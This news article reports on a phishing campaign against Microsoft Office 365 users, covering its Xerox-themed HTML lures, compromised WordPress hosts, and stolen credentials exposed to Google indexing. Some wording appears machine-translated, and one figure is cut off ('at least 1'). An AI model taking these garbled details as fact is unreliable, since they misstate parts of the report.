Hackers who hit thousands of organizations around the world in a massive phishing campaign forgot to protect their looting and let Google steal passwords for public searches.
The phishing campaign has been going on for more than half a year and uses dozens of domains that host the phishing sites. It received continuous updates to make the fake login requests from Microsoft Office 365 more realistic.
Creds in clear view
Despite relying on simple techniques, the campaign has successfully bypassed email protection filters and collected at least 1
Researchers at cyber security companies Check Point and Otorio, which analyzed this campaign, discovered that the hackers revealed stolen identification to the public internet.
In a report published today, they explain that the attackers filtered the information into domains they had registered specifically for the task. Their fault was that they placed the data in a publicly visible file that Google indexed.
As a result, Google may display results for questions about a stolen email address or password, as shown in the screenshot below:
Researchers at the two cybersecurity companies say the attackers also compromised legitimate WordPress servers to host the malicious PHP page provided to the victims.
“Attackers generally prefer to use compromised servers instead of their own infrastructure because of the well-known reputation of existing sites,” the researchers explain.
By processing information from around 500 entries, the researchers were able to determine that companies in the construction, energy and IT sectors were the most common targets for these phishing attacks.
Simple, effective phishing
The attackers used several phishing email themes to entice potential victims to load the landing page that collected their Microsoft Office 365 username and password.
The malicious emails had the target’s first or company name in the subject line and claimed to deliver a Xerox scan alert in HTML format.
Open the attachment loaded in the default browser, a blurry image overlaid by a fake Microsoft Office 365 login form. The username field is already filled with the victim’s email address, which usually removes the suspicion of login theft.
To keep the campaign undetected, the actor used compromised email accounts to distribute fake messages. For one attack, they mimicked the German host provider IONOS with 1 and 1.
Although this campaign started in August, researchers found phishing emails from the same threat actor that dated May 2020.
While Google indexes hacker sites where they store stolen data is not a first, it shows that not all malicious actors are sufficiently skilled to protect the operation. Even if they are not identified, at least their actions can be prevented.